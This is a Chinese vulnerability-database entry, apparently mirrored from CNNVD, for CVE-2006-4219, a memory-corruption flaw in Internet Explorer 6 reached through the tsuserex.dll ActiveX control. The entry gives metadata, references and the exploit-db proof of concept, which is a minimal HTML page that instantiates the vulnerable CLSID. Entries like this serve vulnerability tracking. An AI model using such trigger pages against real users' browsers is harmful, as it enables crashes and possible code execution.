Microsoft Internet Explorer 'TSUserEX.DLL' ActiveX控件内存损坏漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110837 漏洞类型 边界条件错误
发布时间 2006-08-17 更新时间 2006-08-21
CVE编号 CVE-2006-4219 CNNVD-ID CNNVD-200608-304
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/28400
https://cxsecurity.com/issue/WLB-2006080112
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-304
|漏洞详情
MicrosoftWindows2003EESP1CN操作系统的InternetExplorer6.0SP1浏览器中,远程攻击者通过将TerminalServicesCOM对象(tsuserex.dll)实例化为ActiveX对象触发拒绝服务攻击,并可能执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/19570/info

Microsoft Internet Explorer is prone to a memory-corruption vulnerability. This is related to the handling of the 'tsuserex.dll' COM object ActiveX control.

Attackers may exploit this issue via a malicious web page to execute arbitrary code in the context of the currently logged-in user. Exploitation attempts may lead to a denial-of-service condition as well. Attackers may also employ HTML email to carry out an attack.


=============== tsuserex.dll.htm start ================

<!--
// Microsoft Windows 2003 (tsuserex.dll) COM Object Instantiation
Vulnerability
// tested on Windows 2003 EE SP1 CN

// http://www.xsec.org
// nop (nop#xsec.org)

// CLSID: {E2E9CAE6-1E7B-4B8E-BABD-E9BF6292AC29}
// Info: ADsTSUserEx Class
// ProgID: tsuserex.ADsTSUserEx.1
// InprocServer32: C:\WINDOWS\system32\tsuserex.dll

--!>

<html><body>
<object classid="CLSID:{E2E9CAE6-1E7B-4B8E-BABD-E9BF6292AC29}"> </object>
</body>
</html>

=============== tsuserex.dll.htm end ==================
|参考资料

来源:MISC
链接:http://www.xsec.org/index.php?module=Releases&act=view&type=1&id=14
来源:BID
名称:19570
链接:http://www.securityfocus.com/bid/19570
来源:BUGTRAQ
名称:20060817[XSec-06-06]:Windows2003(tsuserex.dll)COMObjectInstantiationVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/443493/100/0/threaded
来源:XF
名称:ie-tsuserex-dos(28444)
链接:http://xforce.iss.net/xforce/xfdb/28444
来源:SREASON
名称:1403
链接:http://securityreason.com/securityalert/1403